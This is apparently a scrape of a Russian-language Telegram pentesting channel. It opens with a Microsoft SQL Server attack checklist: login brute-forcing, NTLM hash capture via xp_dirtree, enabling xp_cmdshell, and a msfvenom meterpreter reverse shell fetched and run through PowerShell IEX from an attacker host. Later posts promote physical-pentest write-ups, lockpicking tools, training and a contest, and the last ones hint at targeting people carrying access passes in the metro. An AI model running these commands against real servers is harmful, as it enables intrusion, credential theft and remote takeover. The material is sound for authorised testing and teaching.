Media is too big
VIEW IN TELEGRAM
В этом уроке мы рассмотрим пентест Microsoft SQL Server.
Чек-лист к данному занятию:
#обучение
#AD
#pentest
#mssql
#xp_dirtree
#xp_cmdshell
#coercing
Чек-лист к данному занятию:
nmap --script ms-sql-info,ms-sql-ntlm-info -sT -sV -p 445,1433 192.168.1.3
crackmapexec mssql <IP> -d <Имя домена> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host>
msf> use auxiliary/scanner/mssql/mssql_login
mssqlclient.py -windows-auth [email protected]
sql> select IS_SRVROLEMEMBER ('sysadmin');
sql> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
msf> use auxiliary/admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_sql_logins
responder -I eth0 -v
sql> use master; exec xp_dirtree '\\<KALI_IP>\share';--
john --wordlist=/usr/share/wordlists/rockyou.txt mssql-svc.hash
sql> SELECT CONVERT(INT, ISNULL(value, value_in_use)) AS config_value FROM sys.configurations WHERE name = 'xp_cmdshell';
sql> EXEC sp_configure 'show advanced options',1;
sql> RECONFIGURE;
sql> EXEC sp_configure 'xp_cmdshell',1;
sql> RECONFIGURE;
sql> xp_cmdshell "echo (Get-Service windefend).Status | powershell"
sql> xp_cmdshell "echo Get-MpComputerStatus | powershell -noprofile"
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 VERBOSE=true -f psh -o meterpreter.ps1
sql> EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString(''[https://192.168.1.5:80/meterpreter.ps1](https://192.168.1.5/meterpreter.ps1)'')"'
msf> use exploit/windows/mssql/mssql_payload
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as
msf> use admin/mssql/mssql_escalate_dbowner
msf> use windows/manage/mssql_local_auth_bypass
#обучение
#AD
#pentest
#mssql
#xp_dirtree
#xp_cmdshell
#coercing
1🔥19👍8🤮1🤝1
Всем привет👋
Давно не писал про проекты, наконец-то руки дотянулись😄
Итак, энергетическая компания, физика + внутряк.
Приятного прочтения🔥
https://teletype.in/@r00t_owl/T3LxWSSywXO
Давно не писал про проекты, наконец-то руки дотянулись😄
Итак, энергетическая компания, физика + внутряк.
Приятного прочтения
https://teletype.in/@r00t_owl/T3LxWSSywXO
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
Взлом в отрасли Энергетики
Всем привет! Давно не было статеек, все руки тянутся перевести контент в видео формат, который и послушать можно и посмотреть на фоне...
1🔥24👍7✍2🤮1
Forwarded from Cyber Media
«Миссия невыполнима», «Бондиана» и другие шедевры шпионского кинематографа могут показаться скукотой по сравнению с буднями специалиста по проведению физических пентестов.
Егор Зайцев, директор департамента противодействия киберугрозам компании Информзащита, автор блога PRO:PENTEST рассказал порталу Cyber Media, что должен уметь специалист по физическому пентесту, какие способы проникновения есть в арсенале атакующих, и как от них защититься.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥32👍4✍1🤮1🤝1
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Отмычка-декодер для аварийного вскрытия перфорированных замков
Универсальная отмычка-декодер для вскрытия перфорированных замков без повреждения. Инструмент позволяет не только вскрыть замок, но и декодировать секретность замка для последующего изготовления копии ключа. Профессиональный инструмент отличного качества.…
1🔥12👍4✍1🤮1
Всем привет!
Показываю как работает Спиннер - очень хорошая штука, которая всегда выручает🔥
https://youtu.be/Wgz6H_qwAjs
Показываю как работает Спиннер - очень хорошая штука, которая всегда выручает
https://youtu.be/Wgz6H_qwAjs
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Спиннер для замков: ускоряем вскрытие
Всем привет! Наверняка вы сталкивались с ситуацией, когда для разблокировки цилиндровых замков требуется осуществить несколько оборотов механизма замка, по этой причине требуется каждый раз вскрывать отмычками секретную часть. Спиннер позволяет ускорить этот…
1🔥11👍3🤮1🤝1
Всем привет!
Недавно прошли в компании обучение по внутреннему пентесту.
Курс был составлен под наши требования, краткий перечень тем которые затронули: Kerberos, NTLM-relay, ADCS, DACL Abuse, Bloodhound, Lateral Movement и т.д. - знакомые темы? Я думаю достаточно знакомые. Наш преподаватель показал базовые вещи, но с нетривиальным подходом, который помог в проектировании своего тулкита. Наши занятия были по 5 часов через день (супер интенсивно), где каждый проговаривал теоретическую основу, связывал ее с практикой и самостоятельно выполнял. Если что-то не получалось мы начинали дебажить, помогать друг другу и приходили к положительному результату. Из ценного выделить смогу разбор проектных ситуаций, когда мы попадаем в различные ограничения и нам необходимо самостоятельно решить проблему. Было много практики, где мы хорошо повеселились.
Обучение проходили 90% - веберы и 10% внутрянщики. И те и те остались довольны.
Если хотите поднять скилы вашей команды по внутряку пишите в личку @dmitt22
Недавно прошли в компании обучение по внутреннему пентесту.
Курс был составлен под наши требования, краткий перечень тем которые затронули: Kerberos, NTLM-relay, ADCS, DACL Abuse, Bloodhound, Lateral Movement и т.д. - знакомые темы? Я думаю достаточно знакомые. Наш преподаватель показал базовые вещи, но с нетривиальным подходом, который помог в проектировании своего тулкита. Наши занятия были по 5 часов через день (супер интенсивно), где каждый проговаривал теоретическую основу, связывал ее с практикой и самостоятельно выполнял. Если что-то не получалось мы начинали дебажить, помогать друг другу и приходили к положительному результату. Из ценного выделить смогу разбор проектных ситуаций, когда мы попадаем в различные ограничения и нам необходимо самостоятельно решить проблему. Было много практики, где мы хорошо повеселились.
Обучение проходили 90% - веберы и 10% внутрянщики. И те и те остались довольны.
Если хотите поднять скилы вашей команды по внутряку пишите в личку @dmitt22
🔥20👍1🤮1🤝1
Как хакеры проникают на защищаемые объекты?
Всем Q, недавно, совместно с @fck_harder, замутили небольшое интервью по прошедшему сольному проекту по физике:
Ссылка!
В прод попала чистейшая выжимка, так что, если такого рода контент залетит, будем дальше пилить и расширять подобный формат.
Интересных проектов много, так что рассказать точно будет о чем😈
Всем Q, недавно, совместно с @fck_harder, замутили небольшое интервью по прошедшему сольному проекту по физике:
Ссылка!
В прод попала чистейшая выжимка, так что, если такого рода контент залетит, будем дальше пилить и расширять подобный формат.
Интересных проектов много, так что рассказать точно будет о чем
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥12🤝2🤮1
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍3🤮2🥴2🤝2
На прошедшем мероприятии от Yandex было много полезной информации в контексте построения процессов SOC. 🤔 Представители менеджмента различных крупных компаний презентовали свои подходы и ответили на интересные вопросы. Было интересно пообщаться вживую со своим подписчиком🫡 , обменялись мыслями по поводу концепций проектной деятельности. Встретил своего бывшего коллегу👋 , он с удовольствием рассказал, какие на его взгляд процессы в моем департаменте необходимо улучшить, а на какие процессы повлиять практически невозможно ввиду специфического подхода высшего менеджмента, начиная с точки захвата лида до точки закрытия актов в рабочих проектах. В общем, было круто в плане обмена полезной информацией с коллегами, вкусных блюд на фуршете и прекрасного панорамного вида на город🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍3🥴2🤝1
С Июля появятся уголовные санкции за нарушение требований к антитеррористической защищенности объектов🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6✍3🔥2🥴1
This media is not supported in your browser
VIEW IN TELEGRAM
CyberED, большое спасибо за приглашение на выпускной!
Было приятно встретиться с моими студентами и не только🔥
Желаю нашей школе дальнейшего развития, пусть она так и остается проводником в наше небольшое ИБ комьюнити для новых специалистов🥳
Спасибо всем за встречу❤️
Было приятно встретиться с моими студентами и не только
Желаю нашей школе дальнейшего развития, пусть она так и остается проводником в наше небольшое ИБ комьюнити для новых специалистов🥳
Спасибо всем за встречу
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥19👍9🤝2
Всем привет!
Ты всегда хотел поучавствовать в проекте по физическому пентесту?
Тогда этот челендж для тебя!
Все условия, а также информация о призах в видео🔥
https://www.youtube.com/watch?v=WE-GAswXMUA
Ты всегда хотел поучавствовать в проекте по физическому пентесту?
Тогда этот челендж для тебя!
Все условия, а также информация о призах в видео
https://www.youtube.com/watch?v=WE-GAswXMUA
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Участвуй в квесте по Физическому пентесту
Всем привет для участия в конкурсе нужно подписаться на паблики:
https://t.iss.one/pro_pentest
https://t.iss.one/fck_harder
https://t.iss.one/api_0
Это видео было создано в рамках конкурса соревнования по физическому пентесту. Все действия, демонстрируемые в этом видео…
https://t.iss.one/pro_pentest
https://t.iss.one/fck_harder
https://t.iss.one/api_0
Это видео было создано в рамках конкурса соревнования по физическому пентесту. Все действия, демонстрируемые в этом видео…
1🔥15🤯4👍3🤝2
Forwarded from Cyber Media
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍10🔥6🤝2
Всем привет! Напоминаем про предстоящее мероприятие offzone и наш конкурс на нем🔥
Все условия и подробности можно посмотреть и послушать в начале видео: https://www.youtube.com/watch?v=WE-GAswXMUA
Все условия и подробности можно посмотреть и послушать в начале видео: https://www.youtube.com/watch?v=WE-GAswXMUA
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Участвуй в квесте по Физическому пентесту
Всем привет для участия в конкурсе нужно подписаться на паблики:
https://t.iss.one/pro_pentest
https://t.iss.one/fck_harder
https://t.iss.one/api_0
Это видео было создано в рамках конкурса соревнования по физическому пентесту. Все действия, демонстрируемые в этом видео…
https://t.iss.one/pro_pentest
https://t.iss.one/fck_harder
https://t.iss.one/api_0
Это видео было создано в рамках конкурса соревнования по физическому пентесту. Все действия, демонстрируемые в этом видео…
1🔥11👍4🤝3🤮2🥴1
Одна из целей через 5 минут будет проезжать станцию Павелецкая середина вагона
1👍6⚡1❤🔥1
Если несколько человек стоит рядом, а ваша цель с пропуском уязвима, можете действовать смело, мы наблюдатели :)
1🔥12⚡1❤🔥1